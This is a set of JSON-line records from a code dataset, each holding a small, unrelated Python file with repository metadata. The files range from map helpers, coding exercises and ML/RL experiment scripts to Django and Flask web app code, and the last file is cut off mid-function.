folium.Map(\n zoom_start=8,\n location=[loc.latitude, loc.longitude],\n # tiles=\"http://127.0.0.1:8000/static/map.json\",\n # attr='© OpenStreetMap contributors',\n max_zoom=24,\n )\n else:\n m = folium.Map(\n max_zoom=24,\n )\n for loc in locations:\n folium.Marker(\n location=[loc.latitude, loc.longitude],\n tooltip=loc.name,\n popup=loc.name,\n icon=folium.Icon(icon=\"globe\", color=random.choice(COLORS)),\n ).add_to(m)\n\n return m\n\n\ndef get_map_html(locations: list[LocationInDb]) -> str:\n m = create_map(locations)\n html: str = m.get_root().render()\n return html\n\n\ndef get_map_bytes(locations: list[LocationInDb]) -> bytes:\n html: str = get_map_html(locations)\n html_bytes = html.encode(\"utf-8\")\n return html_bytes\n","repo_name":"crawlic-stud/map-bot","sub_path":"src/services/map_display.py","file_name":"map_display.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5472761241","text":"def solution(clothes):\n answer = 1\n cloth_dict = {}\n for c in clothes:\n cloth_type = c[1]\n if cloth_type not in cloth_dict:\n cloth_dict[cloth_type] = 1\n else:\n cloth_dict[cloth_type] += 1\n\n for k in cloth_dict.keys():\n answer *= (cloth_dict[k] + 1)\n\n answer -= 1\n return answer\n\n\nprint(solution([[\"yellowhat\", \"headgear\"], [\"bluesunglasses\", \"eyewear\"], [\"green_turban\", \"headgear\"]])) # 5\nprint(solution([[\"crowmask\", \"face\"], [\"bluesunglasses\", \"face\"], [\"smoky_makeup\", \"face\"]])) # 3","repo_name":"UJHa/Codeit-Study","sub_path":"프로그래머스/00_코딩테스트_고득점_Kit/01_해시/3_위장/jinhwan.py","file_name":"jinhwan.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35126027349","text":"import hashlib\n\nclass MerkleTree:\n def __init__(self, transactions):\n self.transactions = transactions\n self.past_transaction = [hashlib.sha256(transaction.encode()).hexdigest() for transaction in transactions]\n self.current_transaction = []\n\n while len(self.past_transaction) > 1:\n if len(self.past_transaction) % 2 != 0:\n self.past_transaction.append(self.past_transaction[-1])\n for i in range(0, len(self.past_transaction), 2):\n transaction = self.past_transaction[i] + self.past_transaction[i+1]\n current = hashlib.sha256(transaction.encode()).hexdigest()\n self.current_transaction.append(current)\n self.past_transaction = self.current_transaction\n self.current_transaction = []\n\n self.root = self.past_transaction[0]\n\n\nclass Ledger:\n def __init__(self):\n self.transactions = []\n self.tree = None\n\n def add_transaction(self, transaction):\n self.transactions.append(transaction)\n self.tree = MerkleTree(self.transactions)\n\n def verify_transaction(self, transaction):\n return transaction in self.transactions\n\n def verify_ledger(self):\n return self.tree.root == hashlib.sha256(''.join(self.transactions).encode()).hexdigest()\n\n\nif __name__ == '__main__':\n\n # Create a new ledger\n ledger = Ledger()\n\n # Add some transactions\n ledger.add_transaction(\"Alice sends 1 BTC to Bob\")\n ledger.add_transaction(\"Bob sends 2 BTC to Charlie\")\n ledger.add_transaction(\"Charlie sends 0.5 BTC to David\")\n\n # Verify that the transactions are present in the ledger\n print(ledger.verify_transaction(\"Alice sends 1 BTC to Bob\")) # True\n print(ledger.verify_transaction(\"Bob sends 2 BTC to David\")) # False\n\n # Verify the integrity of the ledger\n print(ledger.verify_ledger()) # True\n","repo_name":"laiduy98/blockchain_project","sub_path":"merkel_test.py","file_name":"merkel_test.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27965589053","text":"responses = {}\npolling_active = True\nwhile polling_active:\n\tname = raw_input(\"What is your name? \")\n\tresponse = raw_input(\"Which VA stream did you take measurments? \")\n\tresponses[name] = response\n\trepeat = raw_input(\"Is there another person on your team to respond? (yes/no \")\n\tif repeat == 'no':\n\t\tpolling_active = False\n\tprint (\"--- Stream Visitation Results ---\")\n\tfor name, response in responses.items():\n\t\tprint(name + \" took measurments at the \" + response + \" site.\")\n","repo_name":"APtech321/code_em","sub_path":"Alex Peskin/fill_a_dictionary.py","file_name":"fill_a_dictionary.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29438132759","text":"def suma_divisores(a):\n divisores = [0]\n for i in range (1,a):\n if a % i == 0:\n divisores.append(i)\n if sum(divisores) == 1:\n x = True\n\n else:\n x = False\n\n return sum(divisores),x\nif __name__ == \"__main__\":\n x = eval(input(\"Ingrese el numero\"))\n print(suma_divisores(x))\n\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema3_ej1/tema3_ej1_43cf0697a40d89ce2202353334858aeb.py","file_name":"tema3_ej1_43cf0697a40d89ce2202353334858aeb.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11118842589","text":"import pandas as pd\nimport os\nimport warnings\nwarnings.filterwarnings(action='ignore')\n\n\nall_data=pd.DataFrame(columns=['rate', 'review'])\n\nos.chdir('./infos')\nli=os.listdir()\nfor i in li:#모은 리뷰들을 하나의 데이터프레임으로 변경\n data= pd.read_table(i)\n all_data = pd.concat([all_data, data], ignore_index=True, axis=0)\n\n\nprint('초반 데이터 확인 :',len(all_data))#\nall_data.drop_duplicates(subset=['review'], inplace=True)#중복된 리뷰들을 제거한다\nprint('중복 제거 확인 :',len(all_data))\n\nall_data = all_data.dropna(how = 'any') # Null 값이 존재하는 행 제거\nprint('null값이 존재하는가?=',all_data.isnull().values.any()) # Null 값이 존재하는지 확인\n\nprint('\\n===================\\n')\n\n#이벤트/홍보 관련 리뷰 제거\nremove=['이벤트','핫티스트','선.+','십오야','홀세일','통장','작가님','썸딜','마크',\n '나인NINE9','무료','알람','감상후','수정','리뷰뿅','연재','리디','포인트백',\n '포백','이벤','이벵','1+1','나중에','후리뷰','.+님','리다무']\nfor i in remove:\n all_data = all_data[all_data[\"review\"].str.contains(i) == False]\n\nprint(all_data.groupby('rate').size().reset_index(name = 'count'))#원래 데이터양 확인\nall_data.to_csv('origin_all_data.txt',mode='w',index=False)\n\nprint('\\n===================\\n')\n\nn_data=all_data[all_data['rate']==-1]#부정 리뷰 추출\nn_data['rate']=n_data['rate'].apply(lambda x:x+1)\np_data=all_data[all_data['rate']==1].sample(n=len(n_data))#부정 리뷰 길이에 맞춰 긍정 리뷰 랜덤 추출\n\n#긍정/부정 리뷰 합쳐서 새로운 파일로 저장\nresult=pd.concat([n_data,p_data], ignore_index=True, axis=0).sample(frac=1).reset_index(drop=True)\nprint(result.groupby('rate').size().reset_index(name = 'count'))\nresult.to_csv('result_all_data.txt',mode='w', index=False)\n\n\n","repo_name":"world970511/RIDIBOOKS_romance_webnovel_review_Sentiment_Analysis","sub_path":"crawler_ code/clean_info.py","file_name":"clean_info.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32783863177","text":"import tkinter as tk\r\n\r\nroot = tk.Tk()\r\n\r\ndef clear_entry(self): # function is passed event from bind\r\n print(\"clearin\")\r\n print(self.widget) # event.widget tells us which btn was clicked\r\n print(btn._name) # this correlates with btn._name\r\n \r\nbtn = tk.Button(root, text='Clear')\r\nbtn.grid()\r\nbtn.bind('', clear_entry) # no parentheses for function as it is\r\n # a reference not a call\r\nroot.mainloop()\r\n","repo_name":"ccnelson/Python","sub_path":"tkinter/button_bind.py","file_name":"button_bind.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23276276072","text":"import torch\nimport torch.nn as nn\n\nclass ContrastiveLoss(nn.Module):\n def __init__(self, alpha, beta, margin):\n super(ContrastiveLoss, self).__init__()\n self.alpha = alpha\n self.beta = beta\n self.margin = margin\n\n def forward(self, x1, x2, y):\n distance = torch.pairwise_distance(x1, x2, p=2)\n loss = self.alpha * (1-y) * distance**2 + \\\n self.beta * y * (torch.max(torch.zeros_like(distance), self.margin - distance)**2)\n return torch.mean(loss, dtype=torch.float)","repo_name":"serkancancaglayan/Signature-Verification-SiameseNet-SVM","sub_path":"ContrastiveLoss.py","file_name":"ContrastiveLoss.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"11668269782","text":"from ray import tune\n\nfrom toolbox.dece.dece import DECETrainer\nfrom toolbox.dece.utils import *\nfrom toolbox.env import FourWayGridWorld\nfrom toolbox.marl.test_extra_loss import _base\n\n\ndef test_dece(config={}, local_mode=False, t=2000, **kwargs):\n _base(\n trainer=DECETrainer,\n local_mode=local_mode,\n extra_config=config,\n env_name=\"Pendulum-v0\",\n t=t,\n **kwargs\n )\n\n\ndef test_dece_batch0(local_mode=False):\n test_dece(\n {\n DIVERSITY_ENCOURAGING: True,\n USE_BISECTOR: tune.grid_search([True, False]),\n USE_DIVERSITY_VALUE_NETWORK: tune.grid_search([True, False]),\n CLIP_DIVERSITY_GRADIENT: True,\n DELAY_UPDATE: tune.grid_search([True, False]),\n REPLAY_VALUES: tune.grid_search([True, False]),\n TWO_SIDE_CLIP_LOSS: tune.grid_search([True, False])\n }, local_mode\n )\n\n\ndef test_two_side_loss(local_mode=False):\n test_dece(\n {TWO_SIDE_CLIP_LOSS: tune.grid_search([True, False])}, local_mode\n )\n\n\ndef test_delay_update(local_mode=False):\n test_dece({DELAY_UPDATE: tune.grid_search([True, False])}, local_mode)\n\n\ndef test_three_tuning(local_mode=False):\n test_dece(\n {\n DELAY_UPDATE: tune.grid_search([True, False]),\n USE_DIVERSITY_VALUE_NETWORK: tune.grid_search([True, False]),\n REPLAY_VALUES: tune.grid_search([True, False])\n }, local_mode\n )\n\n\ndef test_vtrace(local_mode=False, hard=False):\n _base(\n trainer=DECETrainer,\n local_mode=local_mode,\n extra_config={\n REPLAY_VALUES: True,\n 'sample_batch_size': 50 if hard else 8,\n 'train_batch_size': 450 if hard else 96,\n 'num_sgd_iter': 10 if hard else 2,\n \"sgd_minibatch_size\": 150 if hard else 3 * 8,\n 'model': {\n 'fcnet_hiddens': [16, 16]\n },\n 'seed': 0\n # 'lr': 5e-3,\n },\n env_name=FourWayGridWorld,\n t=100000\n )\n\n\ndef test_vtrace_single_agent(local_mode=False):\n _base(\n trainer=DECETrainer,\n local_mode=local_mode,\n extra_config={\n REPLAY_VALUES: tune.grid_search([True, False]),\n 'sample_batch_size': 50,\n 'train_batch_size': 200,\n 'num_sgd_iter': 10,\n 'sgd_minibatch_size': 50\n },\n env_name=FourWayGridWorld,\n t=20000,\n num_agents=1\n )\n\n\ndef regression_test(local_mode=False):\n _base(\n trainer=DECETrainer,\n local_mode=local_mode,\n extra_config={\n REPLAY_VALUES: tune.grid_search([True, False]),\n # \"normalize_advantage\": tune.grid_search([True, False]),\n # 'use_vtrace': tune.grid_search([True]),\n 'sample_batch_size': 128,\n 'train_batch_size': 512,\n 'sgd_minibatch_size': 128,\n 'num_sgd_iter': 10,\n USE_BISECTOR: False,\n 'seed': tune.grid_search([432, 1920]),\n # 'lr': 5e-3,\n },\n # env_name=\"Pendulum-v0\",\n # env_name=\"CartPole-v0\",\n env_name=FourWayGridWorld,\n t={'time_total_s': 300},\n # t={'timesteps_total': 300000},\n num_agents=1\n )\n\n\ndef only_tnb(local_mode=False):\n test_dece(\n {\n DELAY_UPDATE: tune.grid_search([True, False]),\n ONLY_TNB: True,\n REPLAY_VALUES: False\n }, local_mode\n )\n\n\ndef single_agent_dece(lm=False):\n test_dece(\n {\n DELAY_UPDATE: tune.grid_search([True]),\n REPLAY_VALUES: tune.grid_search([False]),\n USE_DIVERSITY_VALUE_NETWORK: tune.grid_search([False]),\n NORMALIZE_ADVANTAGE: tune.grid_search([False]),\n 'sample_batch_size': 50,\n 'sgd_minibatch_size': 64,\n 'train_batch_size': 2048,\n \"num_cpus_per_worker\": 1,\n \"num_cpus_for_driver\": 1,\n \"num_envs_per_worker\": 5,\n 'num_workers': 1,\n },\n lm,\n num_agents=tune.grid_search([1]),\n t=10000\n )\n\n\ndef replay_values_or_not_test(lm=False):\n test_dece(\n {\n REPLAY_VALUES: tune.grid_search([True, False]),\n 'num_envs_per_worker': 3,\n 'sample_batch_size': 20,\n 'sgd_minibatch_size': 120,\n 'train_batch_size': 480\n },\n lm,\n num_agents=tune.grid_search([1, 3])\n )\n\n\ndef mock_experiment(lm=False):\n _base(\n trainer=DECETrainer,\n local_mode=lm,\n extra_config={\n DELAY_UPDATE: tune.grid_search([True, False]),\n REPLAY_VALUES: tune.grid_search([True, False]),\n 'sample_batch_size': 20,\n 'sgd_minibatch_size': 100,\n 'train_batch_size': 500,\n },\n env_name=FourWayGridWorld,\n t={'timesteps_total': 5000},\n num_agents=tune.grid_search([1, 5])\n )\n\n\ndef no_replay_values_batch_size_bug(lm=False):\n _base(\n trainer=DECETrainer,\n local_mode=lm,\n extra_config={\n REPLAY_VALUES: tune.grid_search([True, False]),\n CONSTRAIN_NOVELTY: tune.grid_search(['soft', 'hard', None]),\n 'num_envs_per_worker': 4,\n 'sample_batch_size': 20,\n 'sgd_minibatch_size': 100,\n 'train_batch_size': 1000,\n \"num_cpus_per_worker\": 1,\n \"num_cpus_for_driver\": 1,\n 'num_workers': 2,\n },\n env_name=FourWayGridWorld,\n t=1000000,\n num_agents=tune.grid_search([5])\n )\n\n\ndef test_constrain_novelty(lm=False):\n test_dece(\n {\n CONSTRAIN_NOVELTY: tune.grid_search(['soft', 'hard', None]),\n \"novelty_stat_length\": 2,\n }, lm\n )\n\n\ndef test_marginal_cases(lm=False):\n test_dece({ONLY_TNB: True}, local_mode=lm)\n # test_dece({USE_BISECTOR: False})\n # test_dece({USE_DIVERSITY_VALUE_NETWORK: False})\n # test_dece({PURE_OFF_POLICY: True}, local_mode=lm)\n\n\nif __name__ == '__main__':\n # test_dece(local_mode=False)\n # test_dece_batch0(local_mode=False)\n # test_two_side_loss(local_mode=True)\n # test_delay_update(local_mode=False)\n # test_three_tuning(local_mode=False)\n single_agent_dece()\n # only_tnb()\n # regression_test(local_mode=False)\n # test_vtrace(local_mode=True)\n # test_vtrace_single_agent(local_mode=False)\n # replay_values_or_not_test(False)\n # test_vtrace(local_mode=True, hard=True)\n # mock_experiment(False)\n # no_replay_values_batch_size_bug(True)\n # test_constrain_novelty(False)\n # test_marginal_cases(False)\n","repo_name":"pengzhenghao/rl-interpretation","sub_path":"toolbox/dece/test_dece.py","file_name":"test_dece.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71690798649","text":"import pytest\r\nfrom myStack import MyStack\r\n\r\ndef test_push():\r\n s = MyStack()\r\n assert 1 == s.push(1)\r\n assert 2 == s.push(2)\r\n assert 2 == s.size()\r\n\r\ndef test_pop():\r\n s = MyStack()\r\n s.push(1)\r\n s.push(2)\r\n assert 2 == s.pop()\r\n assert 1 == s.pop()\r\n\r\ndef test_size():\r\n s = MyStack()\r\n s.push(1)\r\n s.push(2)\r\n s.push(3)\r\n assert 3 == s.size()\r\n s.pop()\r\n assert 2 == s.size()\r\n s.push(4)\r\n assert 3 == s.size()\r\n\r\ndef test_empty():\r\n s = MyStack()\r\n assert 1 == s.isEmpty()\r\n s.push(1)\r\n assert 0 == s.isEmpty()\r\n s.pop()\r\n assert 1 == s.isEmpty()\r\n\r\ndef test_peek():\r\n s = MyStack()\r\n s.push(1)\r\n s.push(2)\r\n assert 2 == s.peek()\r\n s.push(3)\r\n assert 3 == s.peek()\r\n s.pop()\r\n assert 2 == s.peek()\r\n\r\ndef test_sort():\r\n s = MyStack()\r\n s.push(2)\r\n s.push(3)\r\n s.push(1)\r\n s.push(10)\r\n s.push(5)\r\n s.sort()\r\n assert 10 == s.pop()\r\n assert 5 == s.pop()\r\n assert 3 == s.pop()\r\n assert 2 == s.pop()\r\n assert 1 == s.pop()","repo_name":"rjafar/cracking-coding-interview","sub_path":"data_structures/Stack/test_myStack.py","file_name":"test_myStack.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70414815929","text":"import requests\n\nurl = \"http://127.0.0.1:8000/process-image\"\npayload = {\n \"image_src\": \"https://image-auto-enhance-brightness-ml.sgp1.digitaloceanspaces.com/SAMPLE%20(4).jpg\",\n \"output_name\": \"xyab123rc\"\n}\nheaders = {\n \"Content-Type\": \"application/json\"\n}\nresponse = requests.put(url, json=payload, headers=headers)\n\nprint(response.status_code)\nprint(response.json())","repo_name":"arnav-dev-git/fast-api-ml","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"10337481098","text":"from celery import shared_task\nfrom celery.utils.log import get_task_logger\n\nfrom bookmaker.rapid_api import (\n get_next_matches_and_save_to_db,\n get_odds_and_update_matches_on_db,\n get_results_and_update_matches_on_db,\n)\n\nlogger = get_task_logger(__name__)\n\n\n@shared_task\n# beat task test\ndef task_test():\n logger.info(\"Task test log\")\n return \"return test\"\n\n\n@shared_task\ndef next_matches():\n logger.info(\"Getting next matches\")\n try:\n get_next_matches_and_save_to_db()\n except Exception as e:\n logger.info(\"Next matches exception,\", e)\n\n\n@shared_task\ndef odds():\n logger.info(\"Getting odds\")\n try:\n get_odds_and_update_matches_on_db()\n except Exception as e:\n logger.info(\"Odds exception,\", e)\n\n\n@shared_task\ndef results():\n logger.info(\"Getting results\")\n try:\n get_results_and_update_matches_on_db()\n except Exception as e:\n logger.info(\"Results exception,\", e)\n","repo_name":"joshrobbinsuk/brokelads_django_react","sub_path":"backend/bookmaker/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72977423290","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@date: 2022/4/28 下午9:17\n@file: create_cccf.py\n@author: zj\n@description: \n\"\"\"\nfrom typing import List\nimport os\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom zcls2.config.key_word import KEY_SEP\n\n\ndef load_data(data_root):\n assert os.path.isdir(data_root), data_root\n\n class_path = os.path.join(data_root, 'classes.txt')\n classes = np.loadtxt(class_path, dtype=str, delimiter=' ')\n\n train_list = list()\n train_path = os.path.join(data_root, 'train.txt')\n with open(train_path, 'r') as f:\n for line in f:\n tmp_list = line.strip().split(KEY_SEP)\n train_list.append(tmp_list)\n\n test_list = list()\n test_path = os.path.join(data_root, 'test.txt')\n with open(test_path, 'r') as f:\n for line in f:\n tmp_list = line.strip().split(KEY_SEP)\n test_list.append(tmp_list)\n\n return classes, train_list, test_list\n\n\ndef process(data_root, dst_classes: List, dst_train_list: List, dst_test_list: List):\n classes, train_list, test_list = load_data(data_root)\n\n current_class_num = len(dst_classes)\n dst_classes.extend(classes)\n\n for item in tqdm(train_list):\n img_path, target = item\n dst_train_list.append([os.path.join(data_root, img_path), int(target) + current_class_num])\n\n for item in tqdm(test_list):\n img_path, target = item\n dst_test_list.append([os.path.join(data_root, img_path), int(target) + current_class_num])\n\n\ndef save_classes(classes, class_path):\n assert not os.path.exists(class_path), class_path\n np.savetxt(class_path, classes, fmt='%s', delimiter=' ', newline='\\n', header='', )\n\n\ndef save_img_paths(img_path_list, data_path):\n assert not os.path.exists(data_path), data_path\n\n length = len(img_path_list)\n with open(data_path, 'w') as f:\n for idx, (img_path, target) in enumerate(img_path_list):\n if idx < (length - 1):\n f.write(f\"{img_path}{KEY_SEP}{target}\\n\")\n else:\n f.write(f\"{img_path}{KEY_SEP}{target}\")\n\n\ndef main():\n cifar100_dir = 'cifar100'\n caltech101_dir = 'caltech-101'\n cub200_dir = 'CUB_200_2011'\n food101_dir = 'food-101'\n\n print('process ...')\n classes = list()\n train_list = list()\n test_list = list()\n process(cifar100_dir, classes, train_list, test_list)\n process(caltech101_dir, classes, train_list, test_list)\n process(cub200_dir, classes, train_list, test_list)\n process(food101_dir, classes, train_list, test_list)\n\n print('save ...')\n dst_classes_path = './classes.txt'\n save_classes(classes, dst_classes_path)\n dst_train_path = './train.txt'\n save_img_paths(train_list, dst_train_path)\n dst_test_path = './test.txt'\n save_img_paths(test_list, dst_test_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zjykzj/cccf","sub_path":"scripts/create_cccf.py","file_name":"create_cccf.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74227367287","text":"class Money:\n rate = 1\n\n def __init__(self, integer=0, fraction=0):\n self._integer = integer\n self._fraction = fraction\n\n @staticmethod\n def make_from_str(money_str):\n m = Money()\n money_list = money_str.split('.')\n if len(money_list) > 0:\n m._integer = int(money_list[0])\n if len(money_list) > 1:\n m._fraction = int(money_list[1])\n return m\n\n def to_float(self):\n return float('{}.{}'.format(self._integer, self._fraction))\n\n def __repr__(self):\n return '{},{}'.format(self._integer, self._fraction)\n\n def __add__(self, other):\n sum_num = self.to_float() + other.to_float()\n return Money.make_from_str(str(sum_num))\n\n def __sub__(self, other):\n sum_num = self.to_float() - other.to_float()\n return Money.make_from_str(str(sum_num))\n\n def __truediv__(self, other):\n if isinstance(other, Money):\n sum_num = self.to_float()/other.to_float()\n else:\n sum_num = self.to_float()/other\n this_num = self._integer * 100 + self._fraction\n return Money.make_from_str(str(sum_num))\n\n def __lt__(self, other):\n res = False\n if self._integer < other._integer:\n res = True\n elif self._integer == other._integer:\n res = self._fraction < other._fraction\n return res\n\n def __gt__(self, other):\n res = False\n if self._integer > other._integer:\n res = True\n elif self._integer == other._integer:\n res = self._fraction > other._fraction\n return res\n\n def __le__(self, other):\n res = False\n if self._integer < other._integer:\n res = True\n elif self._integer == other._integer:\n res = self._fraction <= other._fraction\n return res\n\n def __ge__(self, other):\n res = False\n if self._integer > other._integer:\n res = True\n elif self._integer == other._integer:\n res = self._fraction >= other._fraction\n return res\n\n def __eq__(self, other):\n if self._integer == other._integer and \\\n self._fraction == other._fraction:\n res = True\n else:\n res = False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def to_dollars(self):\n dol = self.to_float() / Money.rate\n return str(Money.make_from_str(str(dol)))\n\n\nif __name__ == '__main__':\n m1 = Money(10, 50)\n m2 = Money(100, 125)\n print('m1 = ', m1)\n print('m2 = ', m2)\n print('{} + {} = {}'.format(m1, m2, m1+m2))\n print('{} - {} = {}'.format(m1, m2, m1-m2))\n print('{} / {} = {}'.format(m1, m2, m1/m2))\n print('{} < {} = {}'.format(m1, m2, m1 {} = {}'.format(m1, m2, m1>m2))\n print('{} <= {} = {}'.format(m1, m2, m1<=m2))\n print('{} >= {} = {}'.format(m1, m2, m1>=m2))\n Money.rate = 60\n print('{} to dollars = {}'.format(m1, m1.to_dollars()))\n print('{} to dollars = {}'.format(m2, m2.to_dollars()))\n","repo_name":"ZloiGaMeR/PythonCourseATIS","sub_path":"Useful/for_lec14/task_10.py","file_name":"task_10.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2923098607","text":"from django.urls import path\nfrom rest_framework import routers\nfrom .views import (UserViewSet , FriendList , Follow , UnFollow )\n\napp_name = 'accountapi'\n\nrouter = routers.SimpleRouter()\n\nrouter.register('user',UserViewSet,basename='user')\n\nurlpatterns = router.urls\n\nurlpatterns = [\n path('friend/',FriendList.as_view(),name='friend_list'),\n path('follow/',Follow.as_view(),name='follow'),\n path('unfollow/',UnFollow.as_view(),name='un_follow'),\n\n]","repo_name":"hanieh-mav/SocialNetwork-with-drf","sub_path":"accountapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"73070280250","text":"from flask import Flask, render_template, request\r\nfrom pymysql import connections\r\nimport boto3\r\nfrom config import *\r\n\r\napp = Flask(__name__)\r\n\r\nbucket = custombucket\r\nregion = customregion\r\n\r\ndb_conn = connections.Connection(\r\n host=customhost,\r\n port=3306,\r\n user=customuser,\r\n password=custompass,\r\n db=customdb\r\n)\r\n\r\n#routes\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n return render_template('index.html')\r\n\r\n@app.route(\"/contact\")\r\ndef contact():\r\n return render_template('contact.html')\r\n\r\n@app.route(\"/portfolioSammi\")\r\ndef portfolioSammi():\r\n return render_template('portfolio-sammi.html')\r\n\r\n@app.route(\"/portfolioWl\")\r\ndef portfolioWl():\r\n return render_template('portfolio-wl.html')\r\n\r\n@app.route(\"/portfolioYz\")\r\ndef portfolioYz():\r\n return render_template('portfolio-yz.html')\r\n\r\n# four different features\r\n\r\n@app.route(\"/empMgr\", methods=['GET'])\r\ndef empMgr():\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM employee')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('emp-mgr.html', rows=rows)\r\n\r\n@app.route(\"/payroll\", methods=['GET'])\r\ndef payroll():\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM payroll')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('payroll.html', rows=rows)\r\n\r\n@app.route(\"/attendance\", methods=['GET'])\r\ndef attendance():\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM attendance')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('attendance.html', rows=rows)\r\n\r\n@app.route(\"/leave\", methods=['GET'])\r\ndef leave():\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM leave_application')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('leave.html', rows=rows)\r\n\r\n#database routes\r\n\r\n#EMP Manager\r\n@app.route(\"/addEmp\", methods=['GET', 'POST'])\r\ndef addEmp():\r\n return render_template('addEmp.html')\r\n\r\n@app.route(\"/addEmpProcess\", methods=['GET', 'POST'])\r\ndef addEmpProcess():\r\n emp_id = request.form['employee_id']\r\n emp_name = request.form['name']\r\n gender = request.form['gender']\r\n dob = request.form['dob']\r\n address = request.form['address']\r\n email = request.form['email']\r\n phone_num = request.form['phone']\r\n job_title = request.form['job_title']\r\n pay_scale = request.form['pay_scale']\r\n hire_date = request.form['hire_date']\r\n\r\n insert_sql = \"INSERT INTO employee VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute(insert_sql, (emp_id, emp_name, gender, dob, address, email, phone_num, job_title, pay_scale, hire_date))\r\n db_conn.commit()\r\n cursor.close()\r\n\r\n cursor = db_conn.cursor()\r\n cursor.execute('SELECT * FROM employee')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('emp-mgr.html', rows=rows)\r\n\r\n@app.route(\"/searchEmp\", methods=['GET', 'POST'])\r\ndef searchEmp():\r\n return render_template('searchEmp.html')\r\n\r\n@app.route(\"/searchEmpProcess\", methods=['GET', 'POST'])\r\ndef searchEmpProcess():\r\n emp_id = request.form['employee_id']\r\n\r\n search_sql = \"SELECT * FROM employee WHERE Employee_ID=%s\"\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute(search_sql, (emp_id))\r\n rows = cursor.fetchall()\r\n cursor.close() \r\n\r\n return render_template('emp-mgr.html', rows=rows)\r\n\r\n@app.route(\"/removeEmp\", methods=['GET', 'POST'])\r\ndef removeEmp():\r\n return render_template('removeEmp.html')\r\n\r\n@app.route(\"/removeEmpProcess\", methods=['GET', 'POST'])\r\ndef removeEmpProcess():\r\n emp_id = request.form['employee_id']\r\n\r\n remove_sql = \"DELETE FROM employee WHERE Employee_ID = %s\"\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute(remove_sql, emp_id)\r\n db_conn.commit()\r\n cursor.close()\r\n\r\n cursor = db_conn.cursor()\r\n cursor.execute('SELECT * FROM employee')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('emp-mgr.html', rows=rows)\r\n \r\n\r\n#Payroll Manager\r\n@app.route(\"/payslip\")\r\ndef payslip():\r\n\r\n return render_template('payEmp.html')\r\n\r\n@app.route(\"/payslipProcess\", methods=['GET', 'POST'])\r\ndef payslipProcess():\r\n emp_id = request.form['employee_id']\r\n salary = request.form['salary']\r\n date = request.form['date']\r\n\r\n \r\n cursor = db_conn.cursor()\r\n insert_sql = \"INSERT INTO payroll (Employee_ID, Salary, Date) VALUES (%s, %s, %s)\"\r\n\r\n cursor.execute(insert_sql, (emp_id, salary, date))\r\n db_conn.commit()\r\n cursor.close()\r\n db_conn.ping(reconnect=True)\r\n cursor = db_conn.cursor()\r\n\r\n cursor.execute('SELECT * FROM payroll')\r\n rows = cursor.fetchall()\r\n cursor.close()\r\n\r\n return render_template('payroll.html', rows=rows)\r\n\r\n#Attendance Checker\r\n@app.route(\"/markAtt\")\r\ndef markAtt():\r\n\r\n return render_template('markAtt.html')\r\n\r\n@app.route(\"/markAttProcess\", methods=['GET', 